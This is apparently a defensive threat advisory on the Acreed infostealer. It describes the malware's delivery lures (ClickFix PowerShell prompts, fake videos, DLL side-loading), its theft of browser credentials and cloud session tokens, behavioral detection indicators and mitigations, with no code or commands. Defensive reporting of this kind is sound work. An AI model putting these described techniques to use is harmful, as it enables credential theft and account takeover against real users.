Follow on X RSS Feed
Infosteeler

Acreed Infostealer Becomes Top Credential Theft Tool After Lumma Takedown

Cybersec Sentinel

4 min read
Acreed Infostealer Becomes Top Credential Theft Tool After Lumma Takedown

Threat Group: Unknown (Emerging actors on Russian Market)
Threat Type: Infostealer Malware
Exploited Vulnerabilities: Phishing, Malvertising, SEO Poisoning, ClickFix social engineering, AI-generated deception, DLL-SideLoading
Malware Used: Acreed Infostealer
Threat Score: 🔴 High (7.8/10) – Rapid adoption, advanced session token theft, and critical infrastructure targeting
Last Threat Observation: June 4, 2025

Overview

Acreed Infostealer has rapidly emerged as one of the most dangerous credential theft malware strains in the post-Lumma landscape. Detected initially on February 10, 2025, it gained momentum as a substitute for LummaC2 following that malware's takedown. Acreed is optimized for credential harvesting, specifically targeting active session tokens from major cloud platforms including Microsoft 365, Google, AWS, Azure, and Salesforce, allowing it to bypass MFA protections. The malware supports structured JSON-based exfiltration for efficient monetization and resale through marketplaces like the Russian Market. This advisory incorporates late May–early June intelligence and reveals Acreed’s extensive capabilities, its appeal within the cybercrime supply chain, and why it is increasingly tied to ransomware and advanced persistent threat (APT) activities.

Key Details

Delivery Method:

  • Phishing emails using lure documents and fake login pages
  • Malicious software disguised as cracked apps, game mods, or utilities
  • ClickFix techniques (malicious PowerShell via deceptive CAPTCHAs)
  • AI-generated TikTok and YouTube videos directing users to execute payloads manually
  • SEO poisoning and blog spam to surface malicious links in top search results

Target:

  • Windows systems in both consumer and enterprise environments
  • Corporate credentials (SaaS/SSO) and developer platforms
  • Hybrid work endpoints (personal devices with corporate access)

Functions:

  • Credential theft from browsers (Chrome, Edge, Firefox)
  • Cloud token/session hijacking (Microsoft 365, GCP, AWS, Salesforce)
  • Credential capture from VPN, chat, FTP, terminal, and remote tools
  • Screenshot capture, clipboard scraping, and text file harvesting
  • Collection of system info (HWID, IP, software, admin status)

Obfuscation:

  • JSON logs for credentials and host data
  • DLL-SideLoading with trusted binaries
  • Self-deleting payloads, script obfuscation, and sandbox evasion
  • Use of legitimate cloud services for intermediary C2 (e.g., Google Docs, Steam)

Attack Vectors

Acreed distribution leverages a diverse array of vectors:

  • Phishing Campaigns: Classic attachments or embedded fake CAPTCHA overlays tricking users into executing scripts
  • ClickFix Delivery: JavaScript-based deception pages prompting PowerShell downloads with zero clickable links—only user-input
  • AI-Generated Videos: Social media exploits where TikTok-style videos demonstrate command-line instructions with viral audio to lend credibility (seen in campaigns that hit over 500,000 views)
  • Malvertising/SEO Poisoning: Posts disguised as free downloads, developer Q&A responses, or forum threads, often ranking high in search engines
  • DLL Side-Loading: Dropped alongside legitimate EXEs like installers or admin tools, evading detection by masquerading as part of trusted applications

These vectors reflect a shift toward user-enabled compromise, relying on social engineering rather than exploit kits, and require a higher level of behavioral detection.

Known Indicators of Compromise (IoCs)

Hashes and Samples: No static Acreed hashes or binaries publicly disclosed as of June 4, 2025.

Known Behavior Patterns:

  • PowerShell executions downloading files from suspicious shortlink services
  • Creation of JSON-formatted logs in temp or user profile directories
  • Network beacons or uploads to known services like Google Docs, telegra.ph, or GitHub
  • Fileless activity triggered by clipboard or browser events

Anomalous Outbound Connections:

  • Sudden bursts of traffic to encrypted Google services, Steam CDN, or Telegram APIs
  • Session hijack attempts involving reuse of cloud tokens from alternate geolocations

Notable Distinction:

  • Acreed ≠ ACRStealer – These are separate malware families. Confusing the two could lead to incorrect attribution. Acreed does not rely on the same Dead Drop Resolver model.

Mitigation and Prevention

User Awareness:

  • Train users on non-traditional phishing such as video-based instructions and copy-paste malware
  • Reinforce safe browsing and application installation behavior

Email & Web Filtering:

  • Deploy sandboxed email gateways to detect CAPTCHAs, JS redirects, and macro-enabled documents
  • Filter inbound URLs using threat intelligence feeds and DNS-layer protection

Endpoint Protection (EDR):

  • Monitor for script execution, JSON log generation, session token access, DLL-SideLoading attempts
  • Flag and contain devices communicating with unusual legitimate services

Identity Management:

  • Enforce phishing-resistant MFA (FIDO2/WebAuthn)
  • Shorten session durations for sensitive applications
  • Monitor and revoke anomalous logins using active session tokens

Credential Hygiene:

  • Ban browser-based password storage on corporate machines
  • Mandate use of enterprise password managers with central auditing

Dark Web Monitoring:

  • Continuously scan marketplaces like Russian Market for log sales tied to corporate emails or domain credentials
  • Prepare rapid credential rotation and incident response procedures

Network Segmentation and Least Privilege:

  • Prevent lateral movement by segmenting departments and limiting local admin access
  • Disable command-line tools like PowerShell and WScript where unnecessary

Risk Assessment

Threat Score: 🔴 High (7.8/10)

Acreed is not just a credential stealer—it is a full-fledged access broker. It supports a growing criminal ecosystem and provides operational agility to ransomware affiliates and nation-state APTs. It bypasses MFA via session theft and uses dynamic, non-signature-based communication strategies that evade traditional security. Its popularity on criminal forums and marketplace presence indicate long-term sustainability.

Conclusion

Acreed Infostealer exemplifies the new generation of highly adaptive, marketplace-ready infostealers that feed ransomware operators, initial access brokers, and advanced espionage campaigns. Organizations must now assume that a single compromised endpoint can cascade into domain-wide compromise. Traditional endpoint protection and phishing awareness must evolve into continuous behavioral monitoring, identity context validation, and dark web intelligence integration.

Organizations are urged to:

  • Detect token theft and behavioral anomalies post-authentication
  • Stop relying solely on static malware signatures or MFA
  • Combine EDR, adaptive IAM, and credential hygiene with social engineering-resistant education

Defending against Acreed means disrupting not just the malware, but the economic chain that empowers it.

Sources